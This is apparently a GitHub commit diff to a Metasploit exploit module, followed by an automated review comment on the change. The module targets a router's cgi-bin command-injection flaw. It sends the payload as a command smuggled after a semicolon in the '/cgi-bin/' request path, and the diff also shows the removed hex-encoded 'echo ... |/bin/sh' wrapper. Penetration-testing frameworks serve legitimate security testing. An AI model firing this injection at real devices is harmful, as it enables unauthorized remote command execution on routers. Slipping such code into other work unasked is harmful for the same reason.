Updates from review

Also testing some things, mostly lines 84 and 85
bug/bundler_fix
Carter 2017-02-17 18:29:46 -05:00 committed by GitHub
parent 3fac632ce1
commit 63d1de9acd
1 changed files with 7 additions and 7 deletions


@ -38,8 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Payload' => 'Payload' =>
{ {
'Space' => 1024, 'Space' => 1024,
'DisableNops' => true 'DisableNops' => true,
#'EncoderType' => Msf::Encoder::Type::CmdUnixIfs, 'BadChars' => "\x20"
} }
)) ))
@ -81,16 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
# Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit # Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit
def exploit def exploit
is_vuln = check is_vuln = check
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join cmd = payload.encoded # .unpack("C*").map{|c| "\\x%.2x" % c}.join
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&" #str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
print_status('Sending encoded command...') print_status('Sending encoded command...')
vprint_status("Encoded command: #{str}") vprint_status("Encoded command: #{cmd}")
send_request_raw({ 'uri' => "/cgi-bin/;#{str}" }) send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
print_status('Giving the handler time to run...') print_status('Giving the handler time to run...')
handler handler
select(nil, nil, nil, 10.0) sleep(10)
end end
end end
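Review bot: The new side of `exploit` still carries experiment residue that should be deleted before merge: the trailing `# .unpack("C*").map{...}.join` comment on the `cmd = payload.encoded` line and the commented-out `#str = ...` line below it. The commit description itself calls these lines a test. With the hex-escaping step gone, the status strings 'Sending encoded command...' and "Encoded command: #{cmd}" no longer describe what is logged; `vprint_status("Command: #{cmd}")` would be accurate. `is_vuln = check` is assigned but never read in the visible lines, so either drop the local or return early when the check does not report the target as vulnerable, which would also avoid sending the request to hosts that are not affected.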